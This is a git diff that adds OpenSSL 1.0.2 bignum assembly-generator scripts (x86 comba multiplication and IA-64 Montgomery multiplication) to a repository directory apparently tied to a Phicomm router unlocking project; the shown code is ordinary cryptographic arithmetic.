+	    &sub($tmp1,$c);
+	    &mov($c,0);
+	    &adc($c,$c);
+	    &sub($tmp1,$tmp2);
+	    &adc($c,0);
+	    &mov(&DWP($i*4,$r,"",0),$tmp1); 	# *r
+	}
+	    
+	&comment("");
+	&add($b,32);
+	&add($r,32);
+	&sub($num,8);
+	&jnz(&label("pw_neg_loop"));
+	    
+	&set_label("pw_neg_finish",0);
+	&mov($tmp2,&wparam(4));	# get dl
+	&mov($num,0);
+	&sub($num,$tmp2);
+	&and($num,7);
+	&jz(&label("pw_end"));
+	    
+	for ($i=0; $i<7; $i++)
+	{
+	    &comment("dl<0 Tail Round $i");
+	    &mov($tmp1,0);
+	    &mov($tmp2,&DWP($i*4,$b,"",0));# *b
+	    &sub($tmp1,$c);
+	    &mov($c,0);
+	    &adc($c,$c);
+	    &sub($tmp1,$tmp2);
+	    &adc($c,0);
+	    &dec($num) if ($i != 6);
+	    &mov(&DWP($i*4,$r,"",0),$tmp1);	# *r
+	    &jz(&label("pw_end")) if ($i != 6);
+	}
+
+	&jmp(&label("pw_end"));
+	
+	&set_label("pw_pos",0);
+	
+	&and($num,0xfffffff8);	# num / 8
+	&jz(&label("pw_pos_finish"));
+
+	&set_label("pw_pos_loop",0);
+
+	for ($i=0; $i<8; $i++)
+	{
+	    &comment("dl>0 Round $i");
+
+	    &mov($tmp1,&DWP($i*4,$a,"",0));	# *a
+	    &sub($tmp1,$c);
+	    &mov(&DWP($i*4,$r,"",0),$tmp1);	# *r
+	    &jnc(&label("pw_nc".$i));
+	}
+	    
+	&comment("");
+	&add($a,32);
+	&add($r,32);
+	&sub($num,8);
+	&jnz(&label("pw_pos_loop"));
+	    
+	&set_label("pw_pos_finish",0);
+	&mov($num,&wparam(4));	# get dl
+	&and($num,7);
+	&jz(&label("pw_end"));
+	    
+	for ($i=0; $i<7; $i++)
+	{
+	    &comment("dl>0 Tail Round $i");
+	    &mov($tmp1,&DWP($i*4,$a,"",0));	# *a
+	    &sub($tmp1,$c);
+	    &mov(&DWP($i*4,$r,"",0),$tmp1);	# *r
+	    &jnc(&label("pw_tail_nc".$i));
+	    &dec($num) if ($i != 6);
+	    &jz(&label("pw_end")) if ($i != 6);
+	}
+	&mov($c,1);
+	&jmp(&label("pw_end"));
+
+	&set_label("pw_nc_loop",0);
+	for ($i=0; $i<8; $i++)
+	{
+	    &mov($tmp1,&DWP($i*4,$a,"",0));	# *a
+	    &mov(&DWP($i*4,$r,"",0),$tmp1);	# *r
+	    &set_label("pw_nc".$i,0);
+	}
+	    
+	&comment("");
+	&add($a,32);
+	&add($r,32);
+	&sub($num,8);
+	&jnz(&label("pw_nc_loop"));
+	    
+	&mov($num,&wparam(4));	# get dl
+	&and($num,7);
+	&jz(&label("pw_nc_end"));
+	    
+	for ($i=0; $i<7; $i++)
+	{
+	    &mov($tmp1,&DWP($i*4,$a,"",0));	# *a
+	    &mov(&DWP($i*4,$r,"",0),$tmp1);	# *r
+	    &set_label("pw_tail_nc".$i,0);
+	    &dec($num) if ($i != 6);
+	    &jz(&label("pw_nc_end")) if ($i != 6);
+	}
+
+	&set_label("pw_nc_end",0);
+	&mov($c,0);
+
+	&set_label("pw_end",0);
+
+#	&mov("eax",$c);		# $c is "eax"
+
+	&function_end($name);
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/co-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/co-586.pl
new file mode 100644
index 0000000..57101a6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/co-586.pl
@@ -0,0 +1,287 @@
+#!/usr/local/bin/perl
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],$0);
+
+&bn_mul_comba("bn_mul_comba8",8);
+&bn_mul_comba("bn_mul_comba4",4);
+&bn_sqr_comba("bn_sqr_comba8",8);
+&bn_sqr_comba("bn_sqr_comba4",4);
+
+&asm_finish();
+
+sub mul_add_c
+	{
+	local($a,$ai,$b,$bi,$c0,$c1,$c2,$pos,$i,$na,$nb)=@_;
+
+	# pos == -1 if eax and edx are pre-loaded, 0 to load from next
+	# words, and 1 if load return value
+
+	&comment("mul a[$ai]*b[$bi]");
+
+	# "eax" and "edx" will always be pre-loaded.
+	# &mov("eax",&DWP($ai*4,$a,"",0)) ;
+	# &mov("edx",&DWP($bi*4,$b,"",0));
+
+	&mul("edx");
+	&add($c0,"eax");
+	 &mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 0;	# laod next a
+	 &mov("eax",&wparam(0)) if $pos > 0;			# load r[]
+	 ###
+	&adc($c1,"edx");
+	 &mov("edx",&DWP(($nb)*4,$b,"",0)) if $pos == 0;	# laod next b
+	 &mov("edx",&DWP(($nb)*4,$b,"",0)) if $pos == 1;	# laod next b
+	 ###
+	&adc($c2,0);
+	 # is pos > 1, it means it is the last loop 
+	 &mov(&DWP($i*4,"eax","",0),$c0) if $pos > 0;		# save r[];
+	&mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 1;		# laod next a
+	}
+
+sub sqr_add_c
+	{
+	local($r,$a,$ai,$bi,$c0,$c1,$c2,$pos,$i,$na,$nb)=@_;
+
+	# pos == -1 if eax and edx are pre-loaded, 0 to load from next
+	# words, and 1 if load return value
+
+	&comment("sqr a[$ai]*a[$bi]");
+
+	# "eax" and "edx" will always be pre-loaded.
+	# &mov("eax",&DWP($ai*4,$a,"",0)) ;
+	# &mov("edx",&DWP($bi*4,$b,"",0));
+
+	if ($ai == $bi)
+		{ &mul("eax");}
+	else
+		{ &mul("edx");}
+	&add($c0,"eax");
+	 &mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 0;	# load next a
+	 ###
+	&adc($c1,"edx");
+	 &mov("edx",&DWP(($nb)*4,$a,"",0)) if ($pos == 1) && ($na != $nb);
+	 ###
+	&adc($c2,0);
+	 # is pos > 1, it means it is the last loop 
+	 &mov(&DWP($i*4,$r,"",0),$c0) if $pos > 0;		# save r[];
+	&mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 1;		# load next b
+	}
+
+sub sqr_add_c2
+	{
+	local($r,$a,$ai,$bi,$c0,$c1,$c2,$pos,$i,$na,$nb)=@_;
+
+	# pos == -1 if eax and edx are pre-loaded, 0 to load from next
+	# words, and 1 if load return value
+
+	&comment("sqr a[$ai]*a[$bi]");
+
+	# "eax" and "edx" will always be pre-loaded.
+	# &mov("eax",&DWP($ai*4,$a,"",0)) ;
+	# &mov("edx",&DWP($bi*4,$a,"",0));
+
+	if ($ai == $bi)
+		{ &mul("eax");}
+	else
+		{ &mul("edx");}
+	&add("eax","eax");
+	 ###
+	&adc("edx","edx");
+	 ###
+	&adc($c2,0);
+	 &add($c0,"eax");
+	&adc($c1,"edx");
+	 &mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 0;	# load next a
+	 &mov("eax",&DWP(($na)*4,$a,"",0)) if $pos == 1;	# load next b
+	&adc($c2,0);
+	&mov(&DWP($i*4,$r,"",0),$c0) if $pos > 0;		# save r[];
+	 &mov("edx",&DWP(($nb)*4,$a,"",0)) if ($pos <= 1) && ($na != $nb);
+	 ###
+	}
+
+sub bn_mul_comba
+	{
+	local($name,$num)=@_;
+	local($a,$b,$c0,$c1,$c2);
+	local($i,$as,$ae,$bs,$be,$ai,$bi);
+	local($tot,$end);
+
+	&function_begin_B($name,"");
+
+	$c0="ebx";
+	$c1="ecx";
+	$c2="ebp";
+	$a="esi";
+	$b="edi";
+	
+	$as=0;
+	$ae=0;
+	$bs=0;
+	$be=0;
+	$tot=$num+$num-1;
+
+	&push("esi");
+	 &mov($a,&wparam(1));
+	&push("edi");
+	 &mov($b,&wparam(2));
+	&push("ebp");
+	 &push("ebx");
+
+	&xor($c0,$c0);
+	 &mov("eax",&DWP(0,$a,"",0));	# load the first word 
+	&xor($c1,$c1);
+	 &mov("edx",&DWP(0,$b,"",0));	# load the first second 
+
+	for ($i=0; $i<$tot; $i++)
+		{
+		$ai=$as;
+		$bi=$bs;
+		$end=$be+1;
+
+		&comment("################## Calculate word $i"); 
+
+		for ($j=$bs; $j<$end; $j++)
+			{
+			&xor($c2,$c2) if ($j == $bs);
+			if (($j+1) == $end)
+				{
+				$v=1;
+				$v=2 if (($i+1) == $tot);
+				}
+			else
+				{ $v=0; }
+			if (($j+1) != $end)
+				{
+				$na=($ai-1);
+				$nb=($bi+1);
+				}
+			else
+				{
+				$na=$as+($i < ($num-1));
+				$nb=$bs+($i >= ($num-1));
+				}
+#printf STDERR "[$ai,$bi] -> [$na,$nb]\n";
+			&mul_add_c($a,$ai,$b,$bi,$c0,$c1,$c2,$v,$i,$na,$nb);
+			if ($v)
+				{
+				&comment("saved r[$i]");
+				# &mov("eax",&wparam(0));
+				# &mov(&DWP($i*4,"eax","",0),$c0);
+				($c0,$c1,$c2)=($c1,$c2,$c0);
+				}
+			$ai--;
+			$bi++;
+			}
+		$as++ if ($i < ($num-1));
+		$ae++ if ($i >= ($num-1));
+
+		$bs++ if ($i >= ($num-1));
+		$be++ if ($i < ($num-1));
+		}
+	&comment("save r[$i]");
+	# &mov("eax",&wparam(0));
+	&mov(&DWP($i*4,"eax","",0),$c0);
+
+	&pop("ebx");
+	&pop("ebp");
+	&pop("edi");
+	&pop("esi");
+	&ret();
+	&function_end_B($name);
+	}
+
+sub bn_sqr_comba
+	{
+	local($name,$num)=@_;
+	local($r,$a,$c0,$c1,$c2)=@_;
+	local($i,$as,$ae,$bs,$be,$ai,$bi);
+	local($b,$tot,$end,$half);
+
+	&function_begin_B($name,"");
+
+	$c0="ebx";
+	$c1="ecx";
+	$c2="ebp";
+	$a="esi";
+	$r="edi";
+
+	&push("esi");
+	 &push("edi");
+	&push("ebp");
+	 &push("ebx");
+	&mov($r,&wparam(0));
+	 &mov($a,&wparam(1));
+	&xor($c0,$c0);
+	 &xor($c1,$c1);
+	&mov("eax",&DWP(0,$a,"",0)); # load the first word
+
+	$as=0;
+	$ae=0;
+	$bs=0;
+	$be=0;
+	$tot=$num+$num-1;
+
+	for ($i=0; $i<$tot; $i++)
+		{
+		$ai=$as;
+		$bi=$bs;
+		$end=$be+1;
+
+		&comment("############### Calculate word $i");
+		for ($j=$bs; $j<$end; $j++)
+			{
+			&xor($c2,$c2) if ($j == $bs);
+			if (($ai-1) < ($bi+1))
+				{
+				$v=1;
+				$v=2 if ($i+1) == $tot;
+				}
+			else
+				{ $v=0; }
+			if (!$v)
+				{
+				$na=$ai-1;
+				$nb=$bi+1;
+				}
+			else
+				{
+				$na=$as+($i < ($num-1));
+				$nb=$bs+($i >= ($num-1));
+				}
+			if ($ai == $bi)
+				{
+				&sqr_add_c($r,$a,$ai,$bi,
+					$c0,$c1,$c2,$v,$i,$na,$nb);
+				}
+			else
+				{
+				&sqr_add_c2($r,$a,$ai,$bi,
+					$c0,$c1,$c2,$v,$i,$na,$nb);
+				}
+			if ($v)
+				{
+				&comment("saved r[$i]");
+				#&mov(&DWP($i*4,$r,"",0),$c0);
+				($c0,$c1,$c2)=($c1,$c2,$c0);
+				last;
+				}
+			$ai--;
+			$bi++;
+			}
+		$as++ if ($i < ($num-1));
+		$ae++ if ($i >= ($num-1));
+
+		$bs++ if ($i >= ($num-1));
+		$be++ if ($i < ($num-1));
+		}
+	&mov(&DWP($i*4,$r,"",0),$c0);
+	&pop("ebx");
+	&pop("ebp");
+	&pop("edi");
+	&pop("esi");
+	&ret();
+	&function_end_B($name);
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ia64-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ia64-mont.pl
new file mode 100644
index 0000000..e258658
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ia64-mont.pl
@@ -0,0 +1,851 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# January 2010
+#
+# "Teaser" Montgomery multiplication module for IA-64. There are
+# several possibilities for improvement:
+#
+# - modulo-scheduling outer loop would eliminate quite a number of
+#   stalls after ldf8, xma and getf.sig outside inner loop and
+#   improve shorter key performance;
+# - shorter vector support [with input vectors being fetched only
+#   once] should be added;
+# - 2x unroll with help of n0[1] would make the code scalable on
+#   "wider" IA-64, "wider" than Itanium 2 that is, which is not of
+#   acute interest, because upcoming Tukwila's individual cores are
+#   reportedly based on Itanium 2 design;
+# - dedicated squaring procedure(?);
+#
+# January 2010
+#
+# Shorter vector support is implemented by zero-padding ap and np
+# vectors up to 8 elements, or 512 bits. This means that 256-bit
+# inputs will be processed only 2 times faster than 512-bit inputs,
+# not 4 [as one would expect, because algorithm complexity is n^2].
+# The reason for padding is that inputs shorter than 512 bits won't
+# be processed faster anyway, because minimal critical path of the
+# core loop happens to match 512-bit timing. Either way, it resulted
+# in >100% improvement of 512-bit RSA sign benchmark and 50% - of
+# 1024-bit one [in comparison to original version of *this* module].
+#
+# So far 'openssl speed rsa dsa' output on 900MHz Itanium 2 *with*
+# this module is:
+#                   sign    verify    sign/s verify/s
+# rsa  512 bits 0.000290s 0.000024s   3452.8  42031.4
+# rsa 1024 bits 0.000793s 0.000058s   1261.7  17172.0
+# rsa 2048 bits 0.005908s 0.000148s    169.3   6754.0
+# rsa 4096 bits 0.033456s 0.000469s     29.9   2133.6
+# dsa  512 bits 0.000253s 0.000198s   3949.9   5057.0
+# dsa 1024 bits 0.000585s 0.000607s   1708.4   1647.4
+# dsa 2048 bits 0.001453s 0.001703s    688.1    587.4
+#
+# ... and *without* (but still with ia64.S):
+#
+# rsa  512 bits 0.000670s 0.000041s   1491.8  24145.5
+# rsa 1024 bits 0.001988s 0.000080s    502.9  12499.3
+# rsa 2048 bits 0.008702s 0.000189s    114.9   5293.9
+# rsa 4096 bits 0.043860s 0.000533s     22.8   1875.9
+# dsa  512 bits 0.000441s 0.000427s   2265.3   2340.6
+# dsa 1024 bits 0.000823s 0.000867s   1215.6   1153.2
+# dsa 2048 bits 0.001894s 0.002179s    528.1    458.9
+#
+# As it can be seen, RSA sign performance improves by 130-30%,
+# hereafter less for longer keys, while verify - by 74-13%.
+# DSA performance improves by 115-30%.
+
+if ($^O eq "hpux") {
+    $ADDP="addp4";
+    for (@ARGV) { $ADDP="add" if (/[\+DD|\-mlp]64/); }
+} else { $ADDP="add"; }
+
+$code=<<___;
+.explicit
+.text
+
+// int bn_mul_mont (BN_ULONG *rp,const BN_ULONG *ap,
+//		    const BN_ULONG *bp,const BN_ULONG *np,
+//		    const BN_ULONG *n0p,int num);			
+.align	64
+.global	bn_mul_mont#
+.proc	bn_mul_mont#
+bn_mul_mont:
+	.prologue
+	.body
+{ .mmi;	cmp4.le		p6,p7=2,r37;;
+(p6)	cmp4.lt.unc	p8,p9=8,r37
+	mov		ret0=r0		};;
+{ .bbb;
+(p9)	br.cond.dptk.many	bn_mul_mont_8
+(p8)	br.cond.dpnt.many	bn_mul_mont_general
+(p7)	br.ret.spnt.many	b0	};;
+.endp	bn_mul_mont#
+
+prevfs=r2;	prevpr=r3;	prevlc=r10;	prevsp=r11;
+
+rptr=r8;	aptr=r9;	bptr=r14;	nptr=r15;
+tptr=r16;	// &tp[0]
+tp_1=r17;	// &tp[-1]
+num=r18;	len=r19;	lc=r20;
+topbit=r21;	// carry bit from tmp[num]
+
+n0=f6;
+m0=f7;
+bi=f8;
+
+.align	64
+.local	bn_mul_mont_general#
+.proc	bn_mul_mont_general#
+bn_mul_mont_general:
+	.prologue
+{ .mmi;	.save	ar.pfs,prevfs
+	alloc	prevfs=ar.pfs,6,2,0,8
+	$ADDP	aptr=0,in1
+	.save	ar.lc,prevlc
+	mov	prevlc=ar.lc		}
+{ .mmi;	.vframe	prevsp
+	mov	prevsp=sp
+	$ADDP	bptr=0,in2
+	.save	pr,prevpr
+	mov	prevpr=pr		};;
+
+	.body
+	.rotf		alo[6],nlo[4],ahi[8],nhi[6]
+	.rotr		a[3],n[3],t[2]
+
+{ .mmi;	ldf8		bi=[bptr],8		// (*bp++)
+	ldf8		alo[4]=[aptr],16	// ap[0]
+	$ADDP		r30=8,in1	};;
+{ .mmi;	ldf8		alo[3]=[r30],16		// ap[1]
+	ldf8		alo[2]=[aptr],16	// ap[2]
+	$ADDP		in4=0,in4	};;
+{ .mmi;	ldf8		alo[1]=[r30]		// ap[3]
+	ldf8		n0=[in4]		// n0
+	$ADDP		rptr=0,in0		}
+{ .mmi;	$ADDP		nptr=0,in3
+	mov		r31=16
+	zxt4		num=in5		};;
+{ .mmi;	ldf8		nlo[2]=[nptr],8		// np[0]
+	shladd		len=num,3,r0
+	shladd		r31=num,3,r31	};;
+{ .mmi;	ldf8		nlo[1]=[nptr],8		// np[1]
+	add		lc=-5,num
+	sub		r31=sp,r31	};;
+{ .mfb;	and		sp=-16,r31		// alloca
+	xmpy.hu		ahi[2]=alo[4],bi	// ap[0]*bp[0]
+	nop.b		0		}
+{ .mfb;	nop.m		0
+	xmpy.lu		alo[4]=alo[4],bi
+	brp.loop.imp	.L1st_ctop,.L1st_cend-16
+					};;
+{ .mfi;	nop.m		0
+	xma.hu		ahi[1]=alo[3],bi,ahi[2]	// ap[1]*bp[0]
+	add		tp_1=8,sp	}
+{ .mfi;	nop.m		0
+	xma.lu		alo[3]=alo[3],bi,ahi[2]
+	mov		pr.rot=0x20001f<<16
+			// ------^----- (p40) at first (p23)
+			// ----------^^ p[16:20]=1
+					};;
+{ .mfi;	nop.m		0
+	xmpy.lu		m0=alo[4],n0		// (ap[0]*bp[0])*n0
+	mov		ar.lc=lc	}
+{ .mfi;	nop.m		0
+	fcvt.fxu.s1	nhi[1]=f0
+	mov		ar.ec=8		};;
+
+.align	32
+.L1st_ctop:
+.pred.rel	"mutex",p40,p42
+{ .mfi;	(p16)	ldf8		alo[0]=[aptr],8		    // *(aptr++)
+	(p18)	xma.hu		ahi[0]=alo[2],bi,ahi[1]
+	(p40)	add		n[2]=n[2],a[2]		}   // (p23)					}
+{ .mfi;	(p18)	ldf8		nlo[0]=[nptr],8		    // *(nptr++)(p16)
+	(p18)	xma.lu		alo[2]=alo[2],bi,ahi[1]
+	(p42)	add		n[2]=n[2],a[2],1	};; // (p23)
+{ .mfi;	(p21)	getf.sig	a[0]=alo[5]
+	(p20)	xma.hu		nhi[0]=nlo[2],m0,nhi[1]
+	(p42)	cmp.leu		p41,p39=n[2],a[2]   	}   // (p23)
+{ .mfi;	(p23)	st8		[tp_1]=n[2],8
+	(p20)	xma.lu		nlo[2]=nlo[2],m0,nhi[1]
+	(p40)	cmp.ltu		p41,p39=n[2],a[2]	}   // (p23)
+{ .mmb;	(p21)	getf.sig	n[0]=nlo[3]
+	(p16)	nop.m		0
+	br.ctop.sptk	.L1st_ctop			};;
+.L1st_cend:
+
+{ .mmi;	getf.sig	a[0]=ahi[6]		// (p24)
+	getf.sig	n[0]=nhi[4]
+	add		num=-1,num	};;	// num--
+{ .mmi;	.pred.rel	"mutex",p40,p42
+(p40)	add		n[0]=n[0],a[0]
+(p42)	add		n[0]=n[0],a[0],1
+	sub		aptr=aptr,len	};;	// rewind
+{ .mmi;	.pred.rel	"mutex",p40,p42
+(p40)	cmp.ltu		p41,p39=n[0],a[0]
+(p42)	cmp.leu		p41,p39=n[0],a[0]
+	sub		nptr=nptr,len	};;
+{ .mmi;	.pred.rel	"mutex",p39,p41
+(p39)	add		topbit=r0,r0
+(p41)	add		topbit=r0,r0,1
+	nop.i		0		}	
+{ .mmi;	st8		[tp_1]=n[0]
+	add		tptr=16,sp
+	add		tp_1=8,sp	};;
+
+.Louter:
+{ .mmi;	ldf8		bi=[bptr],8		// (*bp++)
+	ldf8		ahi[3]=[tptr]		// tp[0]
+	add		r30=8,aptr	};;
+{ .mmi;	ldf8		alo[4]=[aptr],16	// ap[0]
+	ldf8		alo[3]=[r30],16		// ap[1]
+	add		r31=8,nptr	};;
+{ .mfb;	ldf8		alo[2]=[aptr],16	// ap[2]
+	xma.hu		ahi[2]=alo[4],bi,ahi[3]	// ap[0]*bp[i]+tp[0]
+	brp.loop.imp	.Linner_ctop,.Linner_cend-16
+					}
+{ .mfb;	ldf8		alo[1]=[r30]		// ap[3]
+	xma.lu		alo[4]=alo[4],bi,ahi[3]
+	clrrrb.pr			};;
+{ .mfi;	ldf8		nlo[2]=[nptr],16	// np[0]
+	xma.hu		ahi[1]=alo[3],bi,ahi[2]	// ap[1]*bp[i]
+	nop.i		0		}
+{ .mfi;	ldf8		nlo[1]=[r31]		// np[1]
+	xma.lu		alo[3]=alo[3],bi,ahi[2]
+	mov		pr.rot=0x20101f<<16
+			// ------^----- (p40) at first (p23)
+			// --------^--- (p30) at first (p22)
+			// ----------^^ p[16:20]=1
+					};;
+{ .mfi;	st8		[tptr]=r0		// tp[0] is already accounted
+	xmpy.lu		m0=alo[4],n0		// (ap[0]*bp[i]+tp[0])*n0
+	mov		ar.lc=lc	}
+{ .mfi;
+	fcvt.fxu.s1	nhi[1]=f0
+	mov		ar.ec=8		};;
+
+// This loop spins in 4*(n+7) ticks on Itanium 2 and should spin in
+// 7*(n+7) ticks on Itanium (the one codenamed Merced). Factor of 7
+// in latter case accounts for two-tick pipeline stall, which means
+// that its performance would be ~20% lower than optimal one. No
+// attempt was made to address this, because original Itanium is
+// hardly represented out in the wild...
+.align	32
+.Linner_ctop:
+.pred.rel	"mutex",p40,p42
+.pred.rel	"mutex",p30,p32
+{ .mfi;	(p16)	ldf8		alo[0]=[aptr],8		    // *(aptr++)
+	(p18)	xma.hu		ahi[0]=alo[2],bi,ahi[1]
+	(p40)	add		n[2]=n[2],a[2]		}   // (p23)
+{ .mfi;	(p16)	nop.m		0
+	(p18)	xma.lu		alo[2]=alo[2],bi,ahi[1]
+	(p42)	add		n[2]=n[2],a[2],1	};; // (p23)
+{ .mfi;	(p21)	getf.sig	a[0]=alo[5]
+	(p16)	nop.f		0
+	(p40)	cmp.ltu		p41,p39=n[2],a[2]	}   // (p23)
+{ .mfi;	(p21)	ld8		t[0]=[tptr],8
+	(p16)	nop.f		0
+	(p42)	cmp.leu		p41,p39=n[2],a[2]	};; // (p23)
+{ .mfi;	(p18)	ldf8		nlo[0]=[nptr],8		    // *(nptr++)
+	(p20)	xma.hu		nhi[0]=nlo[2],m0,nhi[1]
+	(p30)	add		a[1]=a[1],t[1]		}   // (p22)
+{ .mfi;	(p16)	nop.m		0
+	(p20)	xma.lu		nlo[2]=nlo[2],m0,nhi[1]
+	(p32)	add		a[1]=a[1],t[1],1	};; // (p22)
+{ .mmi;	(p21)	getf.sig	n[0]=nlo[3]
+	(p16)	nop.m		0
+	(p30)	cmp.ltu		p31,p29=a[1],t[1]	}   // (p22)
+{ .mmb;	(p23)	st8		[tp_1]=n[2],8
+	(p32)	cmp.leu		p31,p29=a[1],t[1]	    // (p22)
+	br.ctop.sptk	.Linner_ctop			};;
+.Linner_cend:
+
+{ .mmi;	getf.sig	a[0]=ahi[6]		// (p24)
+	getf.sig	n[0]=nhi[4]
+	nop.i		0		};;
+
+{ .mmi;	.pred.rel	"mutex",p31,p33
+(p31)	add		a[0]=a[0],topbit
+(p33)	add		a[0]=a[0],topbit,1
+	mov		topbit=r0	};;
+{ .mfi; .pred.rel	"mutex",p31,p33
+(p31)	cmp.ltu		p32,p30=a[0],topbit
+(p33)	cmp.leu		p32,p30=a[0],topbit
+					}
+{ .mfi;	.pred.rel	"mutex",p40,p42
+(p40)	add		n[0]=n[0],a[0]
+(p42)	add		n[0]=n[0],a[0],1
+					};;
+{ .mmi;	.pred.rel	"mutex",p44,p46
+(p40)	cmp.ltu		p41,p39=n[0],a[0]
+(p42)	cmp.leu		p41,p39=n[0],a[0]
+(p32)	add		topbit=r0,r0,1	}
+
+{ .mmi;	st8		[tp_1]=n[0],8
+	cmp4.ne		p6,p0=1,num
+	sub		aptr=aptr,len	};;	// rewind
+{ .mmi;	sub		nptr=nptr,len
+(p41)	add		topbit=r0,r0,1
+	add		tptr=16,sp	}
+{ .mmb;	add		tp_1=8,sp
+	add		num=-1,num		// num--
+(p6)	br.cond.sptk.many	.Louter	};;
+
+{ .mbb;	add		lc=4,lc
+	brp.loop.imp	.Lsub_ctop,.Lsub_cend-16
+	clrrrb.pr			};;
+{ .mii;	nop.m		0
+	mov		pr.rot=0x10001<<16
+			// ------^---- (p33) at first (p17)
+	mov		ar.lc=lc	}
+{ .mii;	nop.m		0
+	mov		ar.ec=3
+	nop.i		0		};;
+
+.Lsub_ctop:
+.pred.rel	"mutex",p33,p35
+{ .mfi;	(p16)	ld8		t[0]=[tptr],8		    // t=*(tp++)
+	(p16)	nop.f		0
+	(p33)	sub		n[1]=t[1],n[1]		}   // (p17)
+{ .mfi;	(p16)	ld8		n[0]=[nptr],8		    // n=*(np++)
+	(p16)	nop.f		0
+	(p35)	sub		n[1]=t[1],n[1],1	};; // (p17)
+{ .mib;	(p18)	st8		[rptr]=n[2],8		    // *(rp++)=r
+	(p33)	cmp.gtu		p34,p32=n[1],t[1]	    // (p17)
+	(p18)	nop.b		0			}
+{ .mib;	(p18)	nop.m		0
+	(p35)	cmp.geu		p34,p32=n[1],t[1]	    // (p17)
+	br.ctop.sptk	.Lsub_ctop			};;
+.Lsub_cend:
+
+{ .mmb;	.pred.rel	"mutex",p34,p36
+(p34)	sub	topbit=topbit,r0	// (p19)
+(p36)	sub	topbit=topbit,r0,1
+	brp.loop.imp	.Lcopy_ctop,.Lcopy_cend-16
+					}
+{ .mmb;	sub	rptr=rptr,len		// rewind
+	sub	tptr=tptr,len
+	clrrrb.pr			};;
+{ .mmi;	and	aptr=tptr,topbit
+	andcm	bptr=rptr,topbit
+	mov	pr.rot=1<<16		};;
+{ .mii;	or	nptr=aptr,bptr
+	mov	ar.lc=lc
+	mov	ar.ec=3			};;
+
+.Lcopy_ctop:
+{ .mmb;	(p16)	ld8	n[0]=[nptr],8
+	(p18)	st8	[tptr]=r0,8
+	(p16)	nop.b	0		}
+{ .mmb;	(p16)	nop.m	0
+	(p18)	st8	[rptr]=n[2],8
+	br.ctop.sptk	.Lcopy_ctop	};;
+.Lcopy_cend:
+
+{ .mmi;	mov		ret0=1			// signal "handled"
+	rum		1<<5			// clear um.mfh
+	mov		ar.lc=prevlc	}
+{ .mib;	.restore	sp
+	mov		sp=prevsp
+	mov		pr=prevpr,0x1ffff
+	br.ret.sptk.many	b0	};;
+.endp	bn_mul_mont_general#
+
+a1=r16;  a2=r17;  a3=r18;  a4=r19;  a5=r20;  a6=r21;  a7=r22;  a8=r23;
+n1=r24;  n2=r25;  n3=r26;  n4=r27;  n5=r28;  n6=r29;  n7=r30;  n8=r31;
+t0=r15;
+
+ai0=f8;  ai1=f9;  ai2=f10; ai3=f11; ai4=f12; ai5=f13; ai6=f14; ai7=f15;
+ni0=f16; ni1=f17; ni2=f18; ni3=f19; ni4=f20; ni5=f21; ni6=f22; ni7=f23;
+
+.align	64
+.skip	48		// aligns loop body
+.local	bn_mul_mont_8#
+.proc	bn_mul_mont_8#
+bn_mul_mont_8:
+	.prologue
+{ .mmi;	.save		ar.pfs,prevfs
+	alloc		prevfs=ar.pfs,6,2,0,8
+	.vframe		prevsp
+	mov		prevsp=sp
+	.save		ar.lc,prevlc
+	mov		prevlc=ar.lc	}
+{ .mmi;	add		r17=-6*16,sp
+	add		sp=-7*16,sp
+	.save		pr,prevpr
+	mov		prevpr=pr	};;
+
+{ .mmi;	.save.gf	0,0x10
+	stf.spill	[sp]=f16,-16
+	.save.gf	0,0x20
+	stf.spill	[r17]=f17,32
+	add		r16=-5*16,prevsp};;
+{ .mmi;	.save.gf	0,0x40
+	stf.spill	[r16]=f18,32
+	.save.gf	0,0x80
+	stf.spill	[r17]=f19,32
+	$ADDP		aptr=0,in1	};;
+{ .mmi;	.save.gf	0,0x100
+	stf.spill	[r16]=f20,32
+	.save.gf	0,0x200
+	stf.spill	[r17]=f21,32
+	$ADDP		r29=8,in1	};;
+{ .mmi;	.save.gf	0,0x400
+	stf.spill	[r16]=f22
+	.save.gf	0,0x800
+	stf.spill	[r17]=f23
+	$ADDP		rptr=0,in0	};;
+
+	.body
+	.rotf		bj[8],mj[2],tf[2],alo[10],ahi[10],nlo[10],nhi[10]
+	.rotr		t[8]
+
+// load input vectors padding them to 8 elements
+{ .mmi;	ldf8		ai0=[aptr],16		// ap[0]
+	ldf8		ai1=[r29],16		// ap[1]
+	$ADDP		bptr=0,in2	}
+{ .mmi;	$ADDP		r30=8,in2
+	$ADDP		nptr=0,in3
+	$ADDP		r31=8,in3	};;
+{ .mmi;	ldf8		bj[7]=[bptr],16		// bp[0]
+	ldf8		bj[6]=[r30],16		// bp[1]
+	cmp4.le		p4,p5=3,in5	}
+{ .mmi;	ldf8		ni0=[nptr],16		// np[0]
+	ldf8		ni1=[r31],16		// np[1]
+	cmp4.le		p6,p7=4,in5	};;
+
+{ .mfi;	(p4)ldf8	ai2=[aptr],16		// ap[2]
+	(p5)fcvt.fxu	ai2=f0
+	cmp4.le		p8,p9=5,in5	}
+{ .mfi;	(p6)ldf8	ai3=[r29],16		// ap[3]
+	(p7)fcvt.fxu	ai3=f0
+	cmp4.le		p10,p11=6,in5	}
+{ .mfi;	(p4)ldf8	bj[5]=[bptr],16		// bp[2]
